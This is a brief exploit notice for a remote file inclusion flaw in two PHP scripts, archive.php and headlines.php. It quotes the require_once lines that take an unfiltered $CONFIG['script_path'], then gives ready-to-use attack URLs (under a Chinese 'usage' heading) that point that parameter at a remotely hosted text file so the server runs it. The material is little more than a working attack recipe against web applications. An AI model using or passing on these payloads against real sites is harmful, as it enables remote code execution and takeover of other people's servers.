+ =>>archive.php
+
+ on line('s) 16,17,18,19
+ =>> require_once($CONFIG['script_path']."config.php");
+ =>> require_once($CONFIG['script_path']."functions/functions.php");
+ =>> require_once($CONFIG['script_path']."functions/mysql.php");
+ =>> require_once($CONFIG['script_path']."functions/template.php");
+
+
+ =>>headlines.php
+ on line('s) 16,17,18,19
+ =>> require_once($CONFIG['script_path']."config.php");
+ =>> require_once($CONFIG['script_path']."functions/functions.php");
+ =>> require_once($CONFIG['script_path']."functions/mysql.php");
+ =>> require_once($CONFIG['script_path']."functions/template.php");
+
+
+ 使用方法:
+ http://[target]/[path]/archive.php?CONFIG[script_path]=http://localhost/a.txt?
+ http://[target]/[path]/headlines.php?CONFIG[script_path]=http://localhost/a.txt?






